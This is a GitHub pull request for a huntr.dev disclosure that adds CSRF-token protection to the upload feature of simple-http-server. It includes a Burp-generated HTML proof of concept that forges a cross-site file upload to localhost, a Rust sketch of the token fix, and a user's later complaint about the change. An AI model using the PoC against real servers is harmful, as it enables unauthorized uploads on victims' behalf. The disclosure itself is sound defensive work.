
Security Fix for Cross Site Request Forgery (CSRF) - huntr.dev #57

Merged
merged 4 commits into from
Apr 15, 2021

Conversation

huntr-helper
Contributor

@doshmajhan (https://huntr.dev/users/doshmajhan) has fixed a potential Cross Site Request Forgery (CSRF) vulnerability in your repository 🔨. For more information, visit our website (https://huntr.dev/) or click the bounty URL below...

| Q | A |
| --- | --- |
| Version Affected | * |
| Bug Fix | YES |
| Original Pull Request | 418sec#1 |

If you are happy with this disclosure, we would love to get a CVE assigned to the vulnerability. Feel free to credit @doshmajhan, the discloser found in the bounty URL (below) and @huntr-helper.

User Comments:

📊 Metadata *

Bounty URL: https://huntr.dev/bounties/1-other-simple-http-server

⚙️ Description *

The 'upload' feature in simple-http-server is vulnerable to cross-site request forgery: it doesn't authenticate the user and just uploads the files which are given to it. If the upload feature is enabled, it can allow attackers to craft web pages, and if victims interact with attackers' web pages then a cross-site request can be sent to the website by simple-http-server and a file can be uploaded on behalf of the victim.

The change here generates a CSRF token when the --upload flag is passed and displays it to the user as well as embedding it in the HTML page for the directory listing. If the csrf parameter is not passed or does not match the generated one when uploading a file, the request will be rejected with a 400.

🐛 Proof of Concept (PoC) *

1. Start a web server with --upload as an argument that enables uploading functionality.
2. Save the following PoC.html and open it in a browser.
3. Click on "Submit Request".
4. Observe that a file was uploaded; you can check the webroot and see the newly uploaded file.

In this process, authentication wasn't required and with minimal user interaction, a file can be uploaded on behalf of the victim.

```html
<!-- PoC.html -->

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost:8000\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------355111547139502215671973431497");
        xhr.withCredentials = true;
        var body = "-----------------------------355111547139502215671973431497\r\n" + 
          "Content-Disposition: form-data; name=\"files\"; filename=\"file.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "hello pwned\r\n\r\n" + 
          "-----------------------------355111547139502215671973431497--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
```

🔥 Proof of Fix (PoF) *

In the attached screenshot you'll see that the request generated by clicking Submit Request in the PoC.html failed with a 400 due to not providing a CSRF token.

Screenshot from 2021-04-08 17-11-04
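As an added illustration of the mechanism the description above outlines (example code, not the project's own source or this PR's diff): a dependency-free Rust sketch that draws a random token once at startup, embeds it in the directory listing's upload form as a hidden `csrf` field, and compares it in constant time before an upload is accepted, answering a request without it with 400. The field names, the 32-byte token length and reading `/dev/urandom` directly are assumptions made here.

```rust
use std::collections::HashMap;
use std::fs::File;
use std::io::Read;

/// Size of the random token in bytes (an assumption for this example).
const TOKEN_BYTES: usize = 32;

/// Hex-encode raw bytes into the token string that is printed at startup.
fn encode_token(raw: &[u8]) -> String {
    raw.iter().map(|b| format!("{:02x}", b)).collect()
}

/// Draw a fresh token from the OS CSPRNG once, when uploads are enabled.
/// Reads /dev/urandom directly to stay dependency-free; a real server would
/// normally use a crate such as `rand` or `getrandom` instead.
fn new_token() -> std::io::Result<String> {
    let mut raw = [0u8; TOKEN_BYTES];
    File::open("/dev/urandom")?.read_exact(&mut raw)?;
    Ok(encode_token(&raw))
}

/// Embed the token as a hidden field in the directory-listing upload form.
/// A page on another origin cannot read this listing, so it cannot learn it.
fn upload_form(token: &str) -> String {
    format!(
        "<form method=\"POST\" enctype=\"multipart/form-data\">\
         <input type=\"hidden\" name=\"csrf\" value=\"{}\"/>\
         <input type=\"file\" name=\"files\" multiple/>\
         <input type=\"submit\" value=\"Upload\"/></form>",
        token
    )
}

/// Compare in constant time so timing does not reveal how many bytes matched.
fn tokens_equal(a: &str, b: &str) -> bool {
    let (a, b) = (a.as_bytes(), b.as_bytes());
    a.len() == b.len() && a.iter().zip(b).fold(0u8, |acc, (x, y)| acc | (x ^ y)) == 0
}

/// Gate an upload on the already-parsed multipart fields: 200 if `csrf` is
/// present and matches the startup token, otherwise 400 Bad Request.
fn check_upload(expected: &str, fields: &HashMap<String, String>) -> u16 {
    match fields.get("csrf") {
        Some(submitted) if tokens_equal(expected, submitted) => 200,
        _ => 400,
    }
}
```

Because the token is also printed to the console at startup, a scripted client can still upload by sending the same `csrf` field alongside the file; only pages that never saw the listing are blocked.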

@TheWaWaR
Owner

Thanks

@TheWaWaR TheWaWaR merged commit 892fb89 into TheWaWaR:master Apr 15, 2021
@dw5

dw5 commented May 9, 2024

I hate this commit. It makes PowerShell file upload impossible. Also, such a simple server is used on LANs; I doubt CSRF is needed.
Literally have to use transfer.sh for simple automated file upload.
